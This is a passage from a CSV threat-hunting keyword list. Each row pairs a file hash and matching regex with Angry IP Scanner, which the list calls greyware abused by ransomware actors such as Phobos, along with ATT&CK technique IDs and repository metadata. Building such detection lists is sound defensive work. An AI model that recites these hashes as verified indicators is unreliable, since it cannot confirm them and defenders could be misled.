abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*47e3c8363e117bc8712d431f05e7041f313629dd27efb004a369bf24b07c6908*",".{0,1000}47e3c8363e117bc8712d431f05e7041f313629dd27efb004a369bf24b07c6908.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*491c9767bdd4c5b94794d52caa0d2e4c50239b235adbc0e2b4b12a15639ec4c0*",".{0,1000}491c9767bdd4c5b94794d52caa0d2e4c50239b235adbc0e2b4b12a15639ec4c0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4b1a9bf186122958ed2d540c0c182057421d0caf9ede82514fe9905705bd49ee*",".{0,1000}4b1a9bf186122958ed2d540c0c182057421d0caf9ede82514fe9905705bd49ee.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4b25db2797b029ea009c3a5267c2e7e91ad6857cd2a8603df19cb8d94e5aaa5c*",".{0,1000}4b25db2797b029ea009c3a5267c2e7e91ad6857cd2a8603df19cb8d94e5aaa5c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4b4cbc201cc169fe490db4a53cf034b28592ea33a14bf38c9a422c1ab4650159*",".{0,1000}4b4cbc201cc169fe490db4a53cf034b28592ea33a14bf38c9a422c1ab4650159.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4bb56ba1129679c1f8ad298151de05396a2962b970f98062dc85edcabb7070e1*",".{0,1000}4bb56ba1129679c1f8ad298151de05396a2962b970f98062dc85edcabb7070e1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4beb7f83d9996c45b7d2f0b504400ad6b87c93793c231d629c47733e8275323c*",".{0,1000}4beb7f83d9996c45b7d2f0b504400ad6b87c93793c231d629c47733e8275323c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4bec505b55c8b2271556dee2b689b05586c54cf1ba32a581bb5ebaaa4f42f580*",".{0,1000}4bec505b55c8b2271556dee2b689b05586c54cf1ba32a581bb5ebaaa4f42f580.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4d31231f9468824107afb6c11e99630e80c98fb347658677cf2c1111d00771c3*",".{0,1000}4d31231f9468824107afb6c11e99630e80c98fb347658677cf2c1111d00771c3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4d8811ff14a7bb842fc02825314f76f7484264ae753814af74fc2412f17b1a75*",".{0,1000}4d8811ff14a7bb842fc02825314f76f7484264ae753814af74fc2412f17b1a75.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*50455d300e96d1d186ff81c97bb45d4697bd057c6a4fa92b280ff8782121ef86*",".{0,1000}50455d300e96d1d186ff81c97bb45d4697bd057c6a4fa92b280ff8782121ef86.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*50f0408d2544a0660a23acfcb9f2ef1a5883adc11861bc9f810367e45aad054d*",".{0,1000}50f0408d2544a0660a23acfcb9f2ef1a5883adc11861bc9f810367e45aad054d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*50f914c195773487957cbdf262fa8e866e17e715bee3418e9591b2f161a16269*",".{0,1000}50f914c195773487957cbdf262fa8e866e17e715bee3418e9591b2f161a16269.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*50fd26b82963fe0813a7cc5a5d1b4c2adb75cac715c498176e8bfc5aba7e5307*",".{0,1000}50fd26b82963fe0813a7cc5a5d1b4c2adb75cac715c498176e8bfc5aba7e5307.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*512f4208d0376a5c5b555930b8c4a3fc3a5a12680655b3d3a167888e6ef202b0*",".{0,1000}512f4208d0376a5c5b555930b8c4a3fc3a5a12680655b3d3a167888e6ef202b0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5273cd88fcbbafe3921dbb88f330a09b4b00c6bbad7d4bc0bf897558a24bb5eb*",".{0,1000}5273cd88fcbbafe3921dbb88f330a09b4b00c6bbad7d4bc0bf897558a24bb5eb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5343c3e7100eac4771f00f0b66e26a821be87ae8e8694815d168ad4dd5cd4352*",".{0,1000}5343c3e7100eac4771f00f0b66e26a821be87ae8e8694815d168ad4dd5cd4352.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*53eb02c62b6ce83e8656eb978259cd26923613d545eb2d63ebba017997b2d672*",".{0,1000}53eb02c62b6ce83e8656eb978259cd26923613d545eb2d63ebba017997b2d672.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*564d2db592127c85b801082955d3af40a9e0a485a2dc5c9d960e8d685621b943*",".{0,1000}564d2db592127c85b801082955d3af40a9e0a485a2dc5c9d960e8d685621b943.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*56976a6b2d3b62ef3e46626df51eb20a4e849e346a5292bf923481f4efb5da4a*",".{0,1000}56976a6b2d3b62ef3e46626df51eb20a4e849e346a5292bf923481f4efb5da4a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*56a728c930af1ddb0583940149de58fa36b2d02cd318e6c437583f121dbcfb6a*",".{0,1000}56a728c930af1ddb0583940149de58fa36b2d02cd318e6c437583f121dbcfb6a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*56d615c6338475744a0259e928f7f20aa88f8bd4889d7a3db3e5a0e5a55a5fb8*",".{0,1000}56d615c6338475744a0259e928f7f20aa88f8bd4889d7a3db3e5a0e5a55a5fb8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*56eae0c5b8a8607a8f25aecae5069fe0555333beef9333cd44a2e8846740529a*",".{0,1000}56eae0c5b8a8607a8f25aecae5069fe0555333beef9333cd44a2e8846740529a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*572a3066b441a61d177c6858322547d508fcbeca9111bcc5db3087d426d9b687*",".{0,1000}572a3066b441a61d177c6858322547d508fcbeca9111bcc5db3087d426d9b687.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*588883f038421d2b273d9c10da1b195a75ca107c274645cf620934d8ee037e9e*",".{0,1000}588883f038421d2b273d9c10da1b195a75ca107c274645cf620934d8ee037e9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*58d81810dda7c93466ab675fb3429d65f4b658ee9c1c1c7113276906abc31de2*",".{0,1000}58d81810dda7c93466ab675fb3429d65f4b658ee9c1c1c7113276906abc31de2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*58f05a0c076f117a861b408411b8c4f1d1e6e3a9f15fdc0501a99a423f80f6bc*",".{0,1000}58f05a0c076f117a861b408411b8c4f1d1e6e3a9f15fdc0501a99a423f80f6bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5abf08594b53850df4821a89755c9578b357577b1f356b2346b0eda7f1e47ba4*",".{0,1000}5abf08594b53850df4821a89755c9578b357577b1f356b2346b0eda7f1e47ba4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5b9244ba79420f46fc1a1cf762c3497767bc93b863f0224ce7d5051f81a6120e*",".{0,1000}5b9244ba79420f46fc1a1cf762c3497767bc93b863f0224ce7d5051f81a6120e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5bdbde8744cb35a016a5af05c34df1e709d8c731dfc4206e5725e2dead801e9b*",".{0,1000}5bdbde8744cb35a016a5af05c34df1e709d8c731dfc4206e5725e2dead801e9b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5bf7ab659ccc836dc47a5c60a8bc653aaed5ff945334f4f1af0ed596c23523c6*",".{0,1000}5bf7ab659ccc836dc47a5c60a8bc653aaed5ff945334f4f1af0ed596c23523c6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5c706aa708b87098f372add5b7c1693e4255462da1cd0f08ce60918e030a6085*",".{0,1000}5c706aa708b87098f372add5b7c1693e4255462da1cd0f08ce60918e030a6085.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5c80fae298c7042c21a46ba76985ab79303001af8b26ea073712d5bff68c7215*",".{0,1000}5c80fae298c7042c21a46ba76985ab79303001af8b26ea073712d5bff68c7215.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5e3df2bbf690bb6e9c58ac2ca4a1ae825d5242159846e5b712c89afd839f6f0c*",".{0,1000}5e3df2bbf690bb6e9c58ac2ca4a1ae825d5242159846e5b712c89afd839f6f0c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5e993a83d506ed23eb4296fb718b1c2ed0dedeb5d3d65cc7860d6176cf0a0ee9*",".{0,1000}5e993a83d506ed23eb4296fb718b1c2ed0dedeb5d3d65cc7860d6176cf0a0ee9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5f2b814295bd21c4480661eac4a9c57b50030d7bf7a7fa4c6f9b0640feb5eb9c*",".{0,1000}5f2b814295bd21c4480661eac4a9c57b50030d7bf7a7fa4c6f9b0640feb5eb9c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5f36bb51a099a20c72d69123aa5b17558fa78ba37b5d340b8db9877e4055ad0e*",".{0,1000}5f36bb51a099a20c72d69123aa5b17558fa78ba37b5d340b8db9877e4055ad0e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5f6ea6654bdf44865cba30a5cb6286407d0362936dbc8a8ea2b6e7859881f99d*",".{0,1000}5f6ea6654bdf44865cba30a5cb6286407d0362936dbc8a8ea2b6e7859881f99d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*5fec32c0fd6dae3b84bd2533e69916a65066176439e8b8481dffc2c565ac70cd*",".{0,1000}5fec32c0fd6dae3b84bd2533e69916a65066176439e8b8481dffc2c565ac70cd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*60f5f94a3dd286eb0339e370e3a1e09af4f183b6b1aeefa3489eb6ff3e9d9983*",".{0,1000}60f5f94a3dd286eb0339e370e3a1e09af4f183b6b1aeefa3489eb6ff3e9d9983.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*61ff953579f1bd83798d1038df66aafbccb8baa85cc8049efb78a280c09d9768*",".{0,1000}61ff953579f1bd83798d1038df66aafbccb8baa85cc8049efb78a280c09d9768.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*62ec1cf50d9485956704274b698e0bfc6cf090650794b8d6cc9a0d7b75638bdf*",".{0,1000}62ec1cf50d9485956704274b698e0bfc6cf090650794b8d6cc9a0d7b75638bdf.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*633add8af3d5bde70aeb20247a4d5fa4f19a93f12764e216155a94e026937f6d*",".{0,1000}633add8af3d5bde70aeb20247a4d5fa4f19a93f12764e216155a94e026937f6d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*66cf5a1681259b3e801b8effceaa210e4c66eba58c9ab260ddc7463474c637e6*",".{0,1000}66cf5a1681259b3e801b8effceaa210e4c66eba58c9ab260ddc7463474c637e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*671ebf4a6d78b932d9544bb7c6469d0e08bd6124462f5b94d90597b82c5579b5*",".{0,1000}671ebf4a6d78b932d9544bb7c6469d0e08bd6124462f5b94d90597b82c5579b5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*689798d97c80041b0d42e4db12ba8d85b30889fccca42e92faed8d5151ffc91d*",".{0,1000}689798d97c80041b0d42e4db12ba8d85b30889fccca42e92faed8d5151ffc91d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*68b1bf3e1cd96f1ac58a0a90b888a2f483b6996bc46d61dd4ae630f23dab93a1*",".{0,1000}68b1bf3e1cd96f1ac58a0a90b888a2f483b6996bc46d61dd4ae630f23dab93a1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*69840aa0cd9ecadd2cf19e7a52f429e46df6d2945022a0ed0186343d10706094*",".{0,1000}69840aa0cd9ecadd2cf19e7a52f429e46df6d2945022a0ed0186343d10706094.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*69d3a5d9b30baf4ed4b24c664eb1e787647acc8e9d631f2498e934c9431c829e*",".{0,1000}69d3a5d9b30baf4ed4b24c664eb1e787647acc8e9d631f2498e934c9431c829e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6b2bc6c1948e0462eabd40d92b7201d44648655679fde260454ce7f970d78b23*",".{0,1000}6b2bc6c1948e0462eabd40d92b7201d44648655679fde260454ce7f970d78b23.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6c514ecc4155806aef7eb0a913cf4a88214e20bdd69694ad9ac5c565d588dea9*",".{0,1000}6c514ecc4155806aef7eb0a913cf4a88214e20bdd69694ad9ac5c565d588dea9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6c9c712e0274ee0e79c0b61f59b8bab9670afc69b905c987c6648da76220abab*",".{0,1000}6c9c712e0274ee0e79c0b61f59b8bab9670afc69b905c987c6648da76220abab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6d9f0234c1022ad90c0ec7837dce7d93df645d7aac58c6fc75a0ef71450d477d*",".{0,1000}6d9f0234c1022ad90c0ec7837dce7d93df645d7aac58c6fc75a0ef71450d477d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6ddb4ce3d13cfc9003bd4351bfd6ce9ad25d3cabea52e9a7e7b9ac1ca0cd6605*",".{0,1000}6ddb4ce3d13cfc9003bd4351bfd6ce9ad25d3cabea52e9a7e7b9ac1ca0cd6605.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6f12c2f6c1d43cc0cfdbd2f73917a227ebd507de82e3d45b6ca6de259ff89f0c*",".{0,1000}6f12c2f6c1d43cc0cfdbd2f73917a227ebd507de82e3d45b6ca6de259ff89f0c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*6f4ad87a95fda2c0a77122b77942d54f688b6a355f40b256578cf7e8c26cc5f1*",".{0,1000}6f4ad87a95fda2c0a77122b77942d54f688b6a355f40b256578cf7e8c26cc5f1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*717500a496b76ffa5205ed4dd9bd2ef79da659d75e1d8e98efb1b2ec8c224509*",".{0,1000}717500a496b76ffa5205ed4dd9bd2ef79da659d75e1d8e98efb1b2ec8c224509.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 